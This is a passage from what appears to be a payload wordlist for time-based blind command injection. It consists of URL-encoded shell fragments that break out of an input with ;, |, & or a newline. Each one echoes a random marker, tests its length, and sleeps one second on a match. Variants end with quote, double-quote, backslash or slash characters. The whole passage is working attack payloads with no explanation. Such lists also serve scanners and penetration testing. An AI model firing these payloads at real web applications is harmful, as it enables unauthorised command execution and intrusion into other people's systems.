D%24%28echo%20EBFNRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20EBFNRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20EBFNRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20EBFNRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20EBFNRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20EBFNRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20EBFNRE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%3B%20str%3D%24%28echo%20PMPVHC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20PMPVHC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20PMPVHC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20PMPVHC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20PMPVHC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20PMPVHC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20PMPVHC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20PMPVHC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20PMPVHC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%7C%20%5B%201%20-ne%20%24%28echo%20EHXCTP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%202%20-ne%20%24%28echo%20EHXCTP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%203%20-ne%20%24%28echo%20EHXCTP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%204%20-ne%20%24%28echo%20EHXCTP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%205%20-ne%20%24%28echo%20EHXCTP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%206%20-ne%20%24%28echo%20EHXCTP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%207%20-ne%20%24%28echo%20EHXCTP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%208%20-ne%20%24%28echo%20EHXCTP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%209%20-ne%20%24%28echo%20EHXCTP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OFDULD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OFDULD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OFDULD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OFDULD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OFDULD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OFDULD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OFDULD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OFDULD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OFDULD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%0A%20str%3D%24%28echo%20JLLXMB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20JLLXMB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20JLLXMB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20JLLXMB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20JLLXMB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20JLLXMB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20JLLXMB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20JLLXMB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20JLLXMB%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%3B%20str%3D%24%28echo%20JHAATD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20JHAATD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20JHAATD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20JHAATD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20JHAATD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20JHAATD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20JHAATD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20JHAATD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20JHAATD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%7C%20%5B%201%20-ne%20%24%28echo%20KBHDAS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%202%20-ne%20%24%28echo%20KBHDAS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%203%20-ne%20%24%28echo%20KBHDAS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%204%20-ne%20%24%28echo%20KBHDAS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%205%20-ne%20%24%28echo%20KBHDAS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%206%20-ne%20%24%28echo%20KBHDAS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%207%20-ne%20%24%28echo%20KBHDAS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%208%20-ne%20%24%28echo%20KBHDAS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%209%20-ne%20%24%28echo%20KBHDAS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFMCIE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFMCIE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFMCIE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFMCIE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFMCIE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFMCIE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFMCIE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFMCIE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BFMCIE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%0A%20str%3D%24%28echo%20XELPPN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20XELPPN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20XELPPN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20XELPPN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20XELPPN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20XELPPN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20XELPPN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20XELPPN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20XELPPN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%3B%20str%3D%24%28echo%20XNKLKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20XNKLKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20XNKLKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20XNKLKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20XNKLKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20XNKLKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20XNKLKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20XNKLKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20XNKLKW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%7C%20%5B%201%20-ne%20%24%28echo%20MYDVJM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%202%20-ne%20%24%28echo%20MYDVJM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%203%20-ne%20%24%28echo%20MYDVJM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%204%20-ne%20%24%28echo%20MYDVJM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%205%20-ne%20%24%28echo%20MYDVJM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%206%20-ne%20%24%28echo%20MYDVJM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%207%20-ne%20%24%28echo%20MYDVJM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%208%20-ne%20%24%28echo%20MYDVJM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%209%20-ne%20%24%28echo%20MYDVJM%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJFZDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJFZDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJFZDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJFZDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJFZDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJFZDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJFZDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJFZDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KJFZDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%0A%20str%3D%24%28echo%20OSXAMI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20OSXAMI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20OSXAMI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20OSXAMI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20OSXAMI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20OSXAMI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20OSXAMI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20OSXAMI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20OSXAMI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20YCZVOO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YCZVOO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YCZVOO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YCZVOO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YCZVOO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YCZVOO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YCZVOO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YCZVOO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YCZVOO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%7C%20%5B%201%20-ne%20%24%28echo%20NMWJXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%202%20-ne%20%24%28echo%20NMWJXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%203%20-ne%20%24%28echo%20NMWJXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%204%20-ne%20%24%28echo%20NMWJXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%205%20-ne%20%24%28echo%20NMWJXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20